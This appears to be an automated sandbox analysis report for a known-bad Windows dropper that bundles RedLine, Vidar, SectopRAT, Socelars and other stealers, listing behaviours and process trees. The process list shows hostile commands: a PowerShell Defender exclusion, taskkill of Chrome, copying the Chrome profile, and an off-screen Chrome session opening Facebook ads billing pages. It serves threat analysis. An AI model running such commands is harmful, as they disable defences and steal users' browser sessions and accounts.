Analysis Overview
SHA256
bdf727b2ac0b42a955c4744bf7768cbb9fa67167321e4fb5639ee5529ccbcfa4
Threat Level: Known bad
The file 9c7f6d97e7dc008682f6761744de856a_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
RedLine payload
RedLine
Redline family
Privateloader family
Socelars family
Sectoprat family
SectopRAT
Vidar family
Socelars payload
PrivateLoader
SectopRAT payload
Vidar
Socelars
Nullmixer family
NullMixer
Vidar Stealer
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
ASPack v2.12-2.42
Checks computer location settings
Reads user/profile data of web browsers
Checks installed software on the system
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
Looks up geolocation information via web service
Drops Chrome extension
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
System Location Discovery: System Language Discovery
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Enumerates system info in registry
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-25 15:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-25 15:56
Reported
2024-11-25 15:59
Platform
win10v2004-20241007-en
Max time kernel
143s
Max time network
149s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\a6168f1f756.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\438dc1669.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\bf2e8642ac5.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4980 set thread context of 912 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\bf2e8642ac5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\745d0d3ff9cc2c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\aae15d524bc2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\a6168f1f756.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\745d0d3ff9cc2c3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\745d0d3ff9cc2c3.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 5f9a813bc385231.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c aae15d524bc2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f65dc44f3b4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 745d0d3ff9cc2c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c bf2e8642ac5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c b5203513d7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c a6168f1f756.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c a070c3838.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 438dc1669.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 5f9a813bc38523010.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe
5f9a813bc385231.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\745d0d3ff9cc2c3.exe
745d0d3ff9cc2c3.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe
f65dc44f3b4.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\aae15d524bc2.exe
aae15d524bc2.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\bf2e8642ac5.exe
bf2e8642ac5.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\b5203513d7.exe
b5203513d7.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\a6168f1f756.exe
a6168f1f756.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\a070c3838.exe
a070c3838.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\438dc1669.exe
438dc1669.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc38523010.exe
5f9a813bc38523010.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2516 -ip 2516
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 568
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe
"C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe" -a
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4632 -ip 4632
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732550209 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 356
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff91229cc40,0x7ff91229cc4c,0x7ff91229cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2080,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2252,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2276 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3132 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3188,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3548 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3568,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3604 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3944,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4748 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4756,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5084,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3976,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2040 /prefetch:2
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
